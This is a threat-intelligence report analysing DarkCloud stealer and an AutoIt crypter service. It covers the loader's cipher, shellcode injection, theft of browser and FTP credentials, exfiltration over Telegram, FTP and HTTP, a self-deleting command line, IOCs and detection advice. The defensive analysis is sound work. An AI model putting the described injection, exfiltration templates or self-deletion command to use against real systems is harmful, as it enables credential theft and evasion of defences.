DarkCloud Stealer via AutoIt Crypter-as-a-Service: Three Encryption Layers, Triple-Channel Exfiltration, and a XAMPP Panel That Ties 25 Samples Together
TL;DR: A malware sample disguised as "Bank slip.exe" peels apart into a three-layer Russian nesting doll: an AutoIt-compiled loader decrypts shellcode via a custom substitution cipher (WRSJLIM), which XOR-decrypts an embedded blob named "hepatoduodenostomy" (yes, really -- it is a medical term for a surgical procedure connecting the liver duct to the intestine, and no, we do not know why). The final payload is DarkCloud stealer, a VB6-compiled infostealer that exfiltrates stolen credentials through three simultaneous channels -- Telegram Bot API, FTP upload, and HTTP POST -- because apparently one exfiltration method is never enough. The real finding is not the stealer itself but the loader: imphash pivoting reveals the same AutoIt stub across 25 samples delivering five distinct malware families (DarkCloud, Formbook, AgentTesla, RemcosRAT, XWorm) in a four-day window, pointing to a crypter-as-a-service operation whose operator left a XAMPP development path and a reusable project ID embedded in the binary.
One "Bank Slip" Leads to a Crypter Operation
This investigation started the way most do: a fresh sample on MalwareBazaar, tagged a310Logger, submitted March 10, 2026, by threatcat_ch. The filename was "Bank slip.exe" -- a financial lure so generic it could target any accounts payable clerk on the planet. The file was 1.34MB, PE32, and at first glance looked like another commodity infostealer delivery. Run it, steal credentials, exfiltrate, done.
But commodity malware riding commodity infrastructure does not explain a 3,115-line AutoIt script with a custom substitution cipher, a shellcode layer with its own XOR decryption routine, and a final payload that encrypts its configuration with Rijndael before talking to Telegram, FTP, and an HTTP gate simultaneously. And it definitely does not explain why the same AutoIt loader -- byte-for-byte identical import hash -- shows up in 24 other samples delivering four completely different malware families.
What looked like a single sample turned into a window into a crypter-as-a-service operation that has been active since at least March 6, 2026, servicing multiple customers across the commodity malware ecosystem.
What Was Found vs. What Was Known
Before diving into the technical layers, here is the gap between public reporting and what this investigation uncovered:
| Aspect | Prior Public Reporting | Our Findings |
|---|---|---|
| Family ID | "a310Logger" (MalwareBazaar tag) | Confirmed as DarkCloud stealer -- the a310Logger alias is secondary. Internal banner: ===============DARKCLOUD=============== |
| Loader | Known to be AutoIt-compiled | Full decryption chain reconstructed: WRSJLIM substitution cipher (key: Tc55s2WqM) decrypts API calls, then XOR key US6DZF1RSLZ045WE8IE5H4KMO decrypts the PE payload |
| Campaign Scale | Single sample submissions | 25 samples across 5 malware families sharing one AutoIt stub, active March 6-10, 2026 |
| Exfiltration | Not publicly documented for this campaign | Triple-channel: Telegram Bot API + FTP + HTTP POST, all configured simultaneously |
| Targets | Unknown | Browser credentials (Chrome, Edge, Brave), FTP clients (FileZilla, WinSCP), keylogging |
| Infrastructure | None reported | XAMPP development environment at D:\xampp\htdocs\, auto-generated project directory, Administrator build account |
The critical upgrade here is scale. A single DarkCloud sample is a nuisance. A crypter service that has pushed 25 samples in four days, delivering five families to what appear to be multiple customers, is infrastructure worth tracking.
The Three-Layer Matryoshka
The infection chain is deliberately layered to defeat analysis at each stage. Each layer uses a different encryption scheme, a different programming language, and requires different tooling to unpack. An analyst who can handle AutoIt decompilation might not have the tooling for shellcode analysis. Someone comfortable with shellcode might not recognize VB6 P-code. The layers create friction, and friction creates time -- time for the stealer to do its work.
[Email Attachment] "Bank slip.exe" / "Payment Advice.exe"
|
v
[Layer 1: AutoIt Compiled EXE] (PE32, 1.34 MB, 3,115 lines)
- WRSJLIM cipher decrypts API names (key: Tc55s2WqM)
- Drops "hepatoduodenostomy" blob to %TEMP%
- VirtualAlloc(0, size, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
- Shellcode execution via DllCallAddress at offset 0x23b0
|
v
[Layer 2: Shellcode]
- XOR-decrypts hepatoduodenostomy
- Key: US6DZF1RSLZ045WE8IE5H4KMO (25-byte, rotation offset 22)
- Maps decrypted PE into memory
|
v
[Layer 3: DarkCloud Stealer] (VB6, 438 KB)
- Drops vbsqlite3.dll to C:\Users\Public\Libraries\
- Reads browser SQLite databases (Login Data, Web Data)
- Harvests FileZilla + WinSCP credentials
- Keylogging via GetAsyncKeyState
- RunOnce registry persistence
|
v
[Exfiltration -- Triple Channel]
- Telegram: api.telegram.org/bot{token}/sendDocument?chat_id={id}
- FTP: FtpCreateDirectoryA -> FtpPutFileA
- HTTP: POST to gate URL, multipart/form-data
|
v
[Self-Deletion]
- cmd /C @TITLE Removing ... @RD /S /Q "install_path"
Let us walk through each layer.
Layer 1: The AutoIt Loader and Its Custom Cipher
| Attribute | Value |
|---|---|
| SHA-256 | f583ffd3f8a32243ed872e8a123f8ac6aa84d506d34a8792edd5e9ee41ba6c7c |
| MD5 | 599c4aab4286f918b6fc0110648a77c6 |
| SHA1 | 1ff71a23583aa99f1dd0bbbfb0de6d97a1779cfc |
| Imphash | 1895460fffad9475fda0c84755ecfee1 |
| File Size | 1,340,928 bytes (1.34 MB) |
| Type | PE32 executable (GUI) Intel 80386 |
| Compile Time | 2026-03-09 23:52:18 UTC |
| AutoIt Version | EA06 (v3) |
| Script Size | 3,115 lines |
| Original Names | "Bank slip.exe", "MT103 - Bank slip.eml.exe" |
The outer layer is an AutoIt v3 compiled executable. AutoIt is a legitimate Windows automation scripting language -- think of it as a souped-up batch file that compiles to a standalone .exe. Malware authors love it because AutoIt binaries are inherently noisy in terms of imports and structure, making it harder for static analysis to distinguish malicious scripts from legitimate automation tools.
The script is 3,115 lines, but the interesting part is the WRSJLIM cipher -- a custom substitution cipher that decrypts API function names and DLL references at runtime. The cipher uses modular subtraction with the key Tc55s2WqM:
For each character in the encrypted string:
key_char = key[position % key_length]
decrypted_char = (encrypted_char - key_char) mod alphabet_size
This is not cryptographically strong -- it is a monoalphabetic substitution with a short key, trivially breakable once you have the key. But it does not need to be strong. Its purpose is to prevent static string extraction. An analyst running strings on the binary will not see VirtualAlloc or DllCallAddress -- they will see gibberish. Only at runtime, after the cipher runs, do the real API names materialize.
After decryption, the loader performs a textbook shellcode injection:
kernel32.VirtualAlloc(0, size, 0x3000, 0x40)
That 0x3000 is MEM_COMMIT | MEM_RESERVE, and 0x40 is PAGE_EXECUTE_READWRITE -- allocating memory that is readable, writable, and executable all at once. This is a well-known red flag that any decent EDR should alert on, but the AutoIt wrapper provides enough cover that many products let it pass.
The shellcode entry point sits at offset 0x23b0 within the allocated buffer, reached via AutoIt's DllCallAddress function.
The Build Artifacts That Should Not Be There
Here is where the operator's discipline breaks down. Embedded in the binary are two paths that should never have survived into a production build:
C:\Users\Administrator\AppData\Local\AutoIt v3\Aut2Exe\autD6B5.tmp
D:\xampp\htdocs\G76UB52V5BVBXXVES4J8OCNH1NZP6\hepatoduodenostomy
The first path tells us the binary was compiled on a Windows machine logged in as Administrator -- not a dedicated build account, not a VM with a sanitized username, just the default admin. The second path is far more interesting: D:\xampp\htdocs\ is the default web root for XAMPP, an Apache/MySQL/PHP development stack. This operator is running a web application -- almost certainly a crypter builder panel -- served through XAMPP.
The directory name G76UB52V5BVBXXVES4J8OCNH1NZP6 has the hallmarks of an auto-generated project or customer ID: 30 uppercase alphanumeric characters, no recognizable words, high entropy. If this is a crypter-as-a-service, each customer or each build job likely gets its own directory. That is useful operational design -- it keeps builds isolated -- but leaving the path in the compiled binary is the digital equivalent of shipping a product with the factory address printed on the inside.
Layer 2: The XOR Decryption and "hepatoduodenostomy"
Yes, the encrypted payload blob is literally named hepatoduodenostomy. It is a real medical term referring to a surgical anastomosis between the hepatic duct and the duodenum. We have no theory for why this was chosen as a filename, but it is certainly memorable.
| Attribute | Value |
|---|---|
| SHA-256 (encrypted) | e2bea9d3eb9169cf83c156b85e8c737812fe3a613eb63af057e8622354deb37b |
| Size | 438,272 bytes |
| XOR Key | US6DZF1RSLZ045WE8IE5H4KMO (25 bytes) |
| Key as stored | DZF1RSLZ045WE8IE5H4KMOUS6 (rotation offset 22) |
The shellcode layer takes the encrypted blob dropped to %TEMP%\hepatoduodenostomy and XOR-decrypts it using a 25-byte key. The key is stored with a rotation offset of 22, meaning the effective key starts at byte 22 of the stored string and wraps around. This is a minor obfuscation -- it means that simply searching for the key string in the binary will find it at a different starting position than what is actually used for decryption, which can trip up automated config extractors.
The decrypted output is a clean PE32 executable: the DarkCloud stealer.
One thing worth noting: both the WRSJLIM key (Tc55s2WqM) and the XOR key (US6DZF1RSLZ045WE8IE5H4KMO) appear to be static across builds from this crypter. This is an OPSEC failure from the crypter operator's perspective -- it means that once an analyst recovers these keys from one sample, they can decrypt every other sample produced by the same service without any additional reverse engineering. A competent crypter service would rotate keys per build.
Layer 3: DarkCloud Stealer -- The VB6 Workhorse
| Attribute | Value |
|---|---|
| SHA-256 | 4ff1f0ed9795f7f3990891bd6cf7e3dd317de240958b6a4731606aa0c5d61220 |
| MD5 | c3fbc8c17b8cd7ca439510ef778a0114 |
| SHA1 | 1a6afa791ac54abc7235db2e3d31eb15824f9d84 |
| Imphash | b791d717bd9da7e095eb7b0b5f6f9cf6 |
| File Size | 438,272 bytes |
| Type | PE32 executable (GUI) Intel 80386, VB6 |
| Compile Time | 2026-03-06 07:21:03 UTC |
| Language | Visual Basic 6 (MSVBVM60.DLL) |
| Project Name | Project1.exe |
| Banner | ===============DARKCLOUD=============== |
DarkCloud is written in Visual Basic 6 -- a language that Microsoft stopped actively developing in 2008 but whose runtime (MSVBVM60.DLL) still ships with every version of Windows. VB6 malware persists in the wild for exactly this reason: zero dependencies, runs everywhere, and the P-code bytecode is annoying to decompile compared to .NET.
The compile timestamp of March 6, 2026 -- four days before the outer loader was compiled on March 9 -- tells us that the stealer payload was built first, then handed off to the crypter service for wrapping. This is consistent with the crypter-as-a-service model: the customer provides the payload, the service provides the protection.
What It Steals
DarkCloud is a focused credential stealer. It does not try to be a RAT, a banking trojan, or a ransomware loader. It steals credentials and gets out.
Browser Credentials:
The stealer drops vbsqlite3.dll to C:\Users\Public\Libraries\ -- a legitimate SQLite3 library compiled for VB6 consumption. This DLL lets DarkCloud directly query the SQLite databases where Chromium-based browsers store credentials:
| Browser | Target Files |
|---|---|
| Google Chrome | Login Data (passwords), Web Data (credit cards, autofill) |
| Microsoft Edge | Same SQLite schema, different path under Program Files (x86) |
| Brave Browser | Same schema, path under BraveSoftware\Brave-Browser\Application |
FTP Client Credentials:
| Client | Target |
|---|---|
| FileZilla | recentservers.xml, sitemanager.xml (plaintext XML with saved passwords) |
| WinSCP | Registry-based credential storage |
Keylogging:
DarkCloud uses the classic GetAsyncKeyState / GetForegroundWindow / GetWindowTextA triad. For each keystroke, it records: the key pressed, the window title (so the operator knows where the victim was typing), and the timestamp. This is not a sophisticated kernel-level keylogger -- it is a user-mode polling loop. But it works, and it has worked since the Windows XP era.
Encrypted Configuration
The configuration variables are encrypted at rest using System.Security.Cryptography.RijndaelManaged (AES) with the key string seEyuLHLKfW:
| Config Variable | Purpose |
|---|---|
@StrFtpServer | FTP exfiltration server address |
@StrFtpUser | FTP username |
@StrFtpPass | FTP password |
@GateUrl | HTTP POST exfiltration gate URL |
@StrBotToken | Telegram bot token |
@ChatID | Telegram chat ID for receiving stolen data |
The configuration values are stored as hex-encoded ciphertexts within the VB6 binary and decrypted at runtime. Full decryption requires emulation of the VB6 runtime's CryptoAPI calls -- a non-trivial exercise that would require either dynamic analysis in a sandbox or a custom decryptor that reimplements the Rijndael parameter setup (key size, padding mode, IV derivation) exactly as the VB6 runtime does it.
Triple-Channel Exfiltration
This is where DarkCloud distinguishes itself from the average infostealer. Most commodity stealers use one exfiltration channel -- usually HTTP POST or Telegram. DarkCloud uses all three simultaneously:
Channel 1 -- Telegram Bot API:
POST https://api.telegram.org/bot{token}/sendDocument
?chat_id={id}
&caption={victim_data}
Telegram is the operator's preferred channel because it is encrypted, fast, and virtually impossible to take down -- you cannot ask Telegram to shut down a bot without law enforcement involvement, and even then, the operator can create a new one in seconds.
Channel 2 -- FTP Upload:
FtpCreateDirectoryA -> FtpSetCurrentDirectoryA -> FtpPutFileA
FTP is the backup channel. It is less convenient than Telegram (the operator needs to maintain FTP infrastructure) but more reliable for large data exfiltration -- uploading a 50MB credential dump over FTP is more practical than sending it as a Telegram document.
Channel 3 -- HTTP POST:
POST {gate_url}
Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
The HTTP gate is the classic web panel approach. Note the hardcoded multipart boundary string 3fbd04f5-b1ed-4060-99b9-fca7ff59c113 -- this is a static UUID baked into the binary, which means it can be used as a network detection signature. Any HTTP POST with this boundary value in a corporate environment should be treated as an IOC.
Persistence and Self-Deletion
DarkCloud writes to the RunOnce registry key for persistence -- a single execution after next reboot. This is lighter-touch than a Run key (which executes on every boot) and may be intentional: the stealer runs once, harvests everything, exfiltrates, and cleans up. It does not need persistent access because credentials do not change often enough to warrant it.
The self-deletion command is memorable:
cmd /C @TITLE Removing ... @RD /S /Q "C:\path\to\malware"
The @TITLE command sets the console window title to "Removing ..." -- a nice touch that makes the command window look benign if a user happens to see it flash on screen. The @ prefix suppresses echo. Then RD /S /Q recursively deletes the malware directory without confirmation.
The Crypter-as-a-Service: 25 Samples, 5 Families, 4 Days
This is where the investigation escalates from "single stealer sample" to "infrastructure operation."
The outer AutoIt loader has an import hash (imphash) of 1895460fffad9475fda0c84755ecfee1. An imphash is a hash of a binary's import table -- the list of DLLs and functions it calls. Two binaries with the same imphash were almost certainly compiled from the same source code or the same build template. When we pivot on this imphash across MalwareBazaar, 25 samples come back, spanning five malware families:
| # | Date | Family | Filename | SHA-256 (prefix) | Reporter |
|---|---|---|---|---|---|
| 1 | Mar 10 | DarkCloud | Bank slip.exe | f583ffd3... | threatcat_ch |
| 2 | Mar 9 | DarkCloud | Payment Advice.exe | d38ef5cb... | James_inthe_box |
| 3 | Mar 9 | DarkCloud | New PO#7889296.exe | bff490d7... | lowmal3 |
| 4 | Mar 9 | DarkCloud | MT103 - Bank slip.eml.exe | 8d9f8265... | threatcat_ch |
| 5 | Mar 9 | Formbook | PI.exe | 8e59fd06... | James_inthe_box |
| 6 | Mar 9 | Formbook | 6606339-SHANG JIA.exe | 7425f75e... | James_inthe_box |
| 7 | Mar 9 | Formbook | JOYFUL LTO-139 ONE-010.exe | fbc524a3... | James_inthe_box |
| 8 | Mar 9 | AgentTesla | Proforma Invoice 06.03.2026.exe | fae02b04... | adrian__luca |
| 9 | Mar 9 | AgentTesla | PO-03-2026-05053.exe | 7f5a747b... | lowmal3 |
| 10 | Mar 6 | RemcosRAT | (hash-named) | 1148fa91... | adrian__luca |
| 11-17 | Mar 6 | Formbook | (7 additional samples) | various | adrian__luca |
| 18 | Mar 6 | AgentTesla | (1 additional sample) | 259c9097... | adrian__luca |
| 19 | Mar 6 | XWorm | (hash-named) | e137d595... | adrian__luca |
25 samples. 5 malware families. 4 days. One AutoIt stub.
The diversity of payloads is the clearest indicator that this is a crypter-as-a-service, not a single actor's toolkit. Consider:
-
DarkCloud is a VB6 credential stealer. Formbook is a .NET form-grabbing infostealer. AgentTesla is a .NET keylogger/stealer. RemcosRAT is a full remote access trojan. XWorm is a modern .NET RAT with worm capabilities. These families have different authors, different customers, different price points on underground forums.
-
Multiple reporters are intercepting samples independently.
threatcat_ch,James_inthe_box,lowmal3, andadrian__lucaare all submitting samples from what appear to be different sources. This means the crypter's output is being distributed through multiple channels simultaneously. -
The filenames span multiple languages: English ("Bank slip", "Payment Advice", "Purchase Order") and Chinese ("SHANG JIA" -- a business/merchant name). Different customers target different regions.
The business model writes itself: the crypter operator sells access to a web panel (hosted on the XAMPP server we found in the build artifacts), customers upload their payload (DarkCloud, Formbook, whatever), select their configuration, and the panel spits out a wrapped AutoIt executable. The G76UB52V5BVBXXVES4J8OCNH1NZP6 directory is the customer's build workspace.
Lure Theme Analysis
Every sample in the cluster uses financial and business email compromise (BEC) themed filenames:
| Lure Category | Examples | Target Persona |
|---|---|---|
| Wire Transfers | "Bank slip.exe", "MT103 - Bank slip.eml.exe" | Finance/Treasury |
| Payment Notices | "Payment Advice.exe" | Accounts Payable |
| Purchase Orders | "New PO#7889296.exe", "PO-03-2026-05053.exe" | Procurement |
| Invoices | "Proforma Invoice 06.03.2026.exe", "PI.exe" | Accounts Payable |
| Shipping/Logistics | "6606339-SHANG JIA.exe", "JOYFUL LTO-139 ONE-010.exe" | Import/Export |
This is textbook business email compromise targeting. The filenames are designed to reach finance departments, accounts payable, and procurement personnel -- people who routinely open attachments about wire transfers, purchase orders, and invoices as part of their daily workflow. The MT103 reference is particularly targeted: an MT103 is a SWIFT payment message format, which means this lure is aimed at people who handle international wire transfers.
Alternative Delivery: JavaScript Dropper
One associated sample is a 3MB JavaScript dropper (SHA-256: 02830077...), also classified as a310Logger on MalwareBazaar. This suggests the operation maintains at least two delivery vectors -- EXE attachments for direct email campaigns and JavaScript droppers for scenarios where executable attachments would be blocked. The JavaScript file size (3MB) is abnormally large for a JS dropper and likely contains the same encrypted payload blob, just wrapped in a different first-stage language.
OPSEC Failures: A Report Card
The crypter operator made six distinct operational security mistakes that allow for campaign tracking and potential attribution:
| # | Failure | Impact |
|---|---|---|
| 1 | XAMPP development path in binary: D:\xampp\htdocs\G76UB52V5BVBXXVES4J8OCNH1NZP6\ | Reveals web-panel-based crypter infrastructure. The htdocs path confirms Apache/PHP serving, almost certainly a builder interface. |
| 2 | Administrator build account: C:\Users\Administrator\ | No build environment isolation. The operator compiles on their primary Windows account. |
| 3 | Auto-generated project ID leak: G76UB52V5BVBXXVES4J8OCNH1NZP6 | If this is a per-customer or per-build ID, it can be correlated across samples to cluster builds from the same customer. |
| 4 | Reused imphash across all 25 samples: 1895460fffad9475fda0c84755ecfee1 | Trivial campaign clustering. One imphash query returns the entire operation. |
| 5 | Static WRSJLIM key: Tc55s2WqM reused across builds | Once recovered, decrypts the AutoIt layer for every sample from this crypter. |
| 6 | Static XOR key: US6DZF1RSLZ045WE8IE5H4KMO reused across builds | Same as above -- one key decrypts all payload blobs. |
Failures 4, 5, and 6 are especially damaging because they are structural. They are not one-off mistakes; they are design decisions baked into the crypter's build process. The operator either does not know that imphash clustering exists, does not know that key reuse enables bulk decryption, or does not care because the customer base is not sophisticated enough to demand better.
For threat intelligence teams, this is a gift. A single imphash query will continue to surface new samples from this crypter for as long as the operator does not change their build template. And given that they have not changed it across 25 samples in four days, there is no reason to expect they will start now.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Implementation |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | Email with "Bank slip.exe", "Payment Advice.exe" |
| Execution | Command and Scripting: AutoIt | T1059.010 | AutoIt-compiled loader with WRSJLIM cipher |
| Defense Evasion | Obfuscated Files or Information | T1027 | Three-layer encryption: WRSJLIM + XOR + Rijndael |
| Defense Evasion | Process Injection | T1055 | VirtualAlloc RWX + DllCallAddress shellcode execution |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Self-deletion via cmd /C @RD /S /Q |
| Credential Access | Credentials from Password Stores: Web Browsers | T1555.003 | SQLite-based theft of Chrome, Edge, Brave credential databases |
| Credential Access | Credentials from Password Stores: FTP Clients | T1555.005 | FileZilla XML parsing, WinSCP registry extraction |
| Collection | Input Capture: Keylogging | T1056.001 | GetAsyncKeyState polling loop |
| Exfiltration | Exfiltration Over Web Service | T1567 | Telegram Bot API sendDocument + HTTP POST gate |
| Exfiltration | Exfiltration Over Alternative Protocol | T1048 | FTP upload via FtpPutFileA |
| Persistence | Boot or Logon Autostart: Registry Run Keys | T1547.001 | RunOnce registry key |
Indicators of Compromise
File Indicators
# Outer Loader (AutoIt Compiled)
SHA256: f583ffd3f8a32243ed872e8a123f8ac6aa84d506d34a8792edd5e9ee41ba6c7c
MD5: 599c4aab4286f918b6fc0110648a77c6
SHA1: 1ff71a23583aa99f1dd0bbbfb0de6d97a1779cfc
Imphash: 1895460fffad9475fda0c84755ecfee1
SSDeep: 24576:K5EmXFtKaL4/oFe5T9yyXYfP1ijXdaWdJw3566v7pJh8tA60wr:KPVt/LZeJbInQRaWduLv7Lh8tQ
# Inner Payload (DarkCloud Stealer, VB6)
SHA256: 4ff1f0ed9795f7f3990891bd6cf7e3dd317de240958b6a4731606aa0c5d61220
MD5: c3fbc8c17b8cd7ca439510ef778a0114
SHA1: 1a6afa791ac54abc7235db2e3d31eb15824f9d84
Imphash: b791d717bd9da7e095eb7b0b5f6f9cf6
# Encrypted Payload Blob ("hepatoduodenostomy")
SHA256: e2bea9d3eb9169cf83c156b85e8c737812fe3a613eb63af057e8622354deb37b
Network Indicators
# Exfiltration endpoints (defanged)
api[.]telegram[.]org -- Telegram Bot API (credential exfiltration)
# HTTP POST multipart boundary (static, detectable at proxy)
3fbd04f5-b1ed-4060-99b9-fca7ff59c113
Behavioral Indicators
# File system artifacts
%TEMP%\hepatoduodenostomy -- encrypted payload blob (Layer 2)
C:\Users\Public\Libraries\vbsqlite3.dll -- SQLite DLL for browser DB access
HKCU\...\RunOnce\{value} -- persistence registry key
# Self-deletion command pattern
cmd /C @TITLE Removing ... @RD /S /Q "{install_path}"
# Identification string (in decrypted payload)
===============DARKCLOUD===============
# Build artifact paths (in outer loader)
D:\xampp\htdocs\G76UB52V5BVBXXVES4J8OCNH1NZP6\
C:\Users\Administrator\AppData\Local\AutoIt v3\Aut2Exe\autD6B5.tmp
Encryption Keys (for bulk decryption of crypter output)
# AutoIt WRSJLIM substitution cipher key
Tc55s2WqM
# Payload XOR decryption key (rotation offset 22)
Stored: DZF1RSLZ045WE8IE5H4KMOUS6
Effective: US6DZF1RSLZ045WE8IE5H4KMO
# DarkCloud config Rijndael key string
seEyuLHLKfW
Campaign Cluster Pivot
# Imphash (returns 25+ samples across 5 malware families)
1895460fffad9475fda0c84755ecfee1
# Families delivered by this crypter
DarkCloud/a310Logger (4 samples)
Formbook (10 samples)
AgentTesla (3 samples)
RemcosRAT (1 sample)
XWorm (1 sample)
+ additional uncategorized samples
Detection Recommendations
Immediate (24-48 hours)
- Imphash blocking: Deploy
1895460fffad9475fda0c84755ecfee1as an endpoint detection rule. This single indicator covers the entire crypter operation across all five malware families. - Telegram alerting: Alert on
api.telegram.orgconnections from non-browser processes. Legitimate Telegram Desktop has a recognizable process name and certificate; DarkCloud running from%TEMP%does not. - Multipart boundary detection: The static HTTP boundary
3fbd04f5-b1ed-4060-99b9-fca7ff59c113can be deployed as a web proxy or IDS signature. This is a high-fidelity indicator -- the probability of this exact UUID appearing in legitimate traffic is astronomically low. - Email gateway rules: Block or quarantine attachments matching financial lure patterns ("Bank slip", "MT103", "Payment Advice", "Purchase Order", "Proforma Invoice") with PE32 or AutoIt signatures.
Short-term (1-2 weeks)
- Endpoint hunt: Search for
vbsqlite3.dllinC:\Users\Public\Libraries\across all endpoints. This file has no legitimate reason to exist in this directory. - Temp directory sweep: Search for files named
hepatoduodenostomyin%TEMP%directories. This blob name appears to be static across builds. - Registry audit: Review
HKCU\...\RunOncekeys across the fleet for entries that were not set by known software deployment tools. - Email log review: Search for the financial-themed attachment filenames listed in the campaign table. If any reached user mailboxes, those endpoints need immediate forensic triage.
Medium-term (1-3 months)
- Imphash monitoring: Set up a recurring MalwareBazaar query for imphash
1895460fffad9475fda0c84755ecfee1. This crypter is actively producing new samples and will continue to do so until the operator changes their build template. - XAMPP path pattern tracking: The
D:\xampp\htdocs\{random_id}\path structure may appear in future samples from this crypter, potentially with different project IDs. Tracking these IDs could enable customer-level clustering. - IOC sharing: Submit all indicators to MISP, your ISAC, and community feeds. The breadth of this crypter's customer base means the same indicators are relevant to organizations targeted by Formbook, AgentTesla, and RemcosRAT -- not just DarkCloud.
- AutoIt script analysis automation: Given the static keys, organizations with malware analysis capabilities should build automated decryptors for this crypter's output. The WRSJLIM cipher with key
Tc55s2WqMfollowed by XOR with keyUS6DZF1RSLZ045WE8IE5H4KMOwill decrypt the payload from any sample produced by this service, enabling rapid triage of new variants.
References
- MalwareBazaar Sample: https://bazaar.abuse.ch/sample/f583ffd3f8a32243ed872e8a123f8ac6aa84d506d34a8792edd5e9ee41ba6c7c/
- CAPEv2 Sandbox Analysis: https://www.capesandbox.com/analysis/56904/
- DarkCloud YARA Rule (YungBinary): https://x.com/YungBinary/status/1971585972912689643
- ClamAV Signature: SecuriteInfo.com.Win32.Trojan.Agent.35E5V6.UNOFFICIAL
Published by Breakglass Intelligence. Investigation conducted 2026-03-10. 1 "Bank slip" detonated. 3 encryption layers peeled. 25 samples clustered. 5 malware families, 1 crypter service, 0 key rotation. Classification: TLP:CLEAR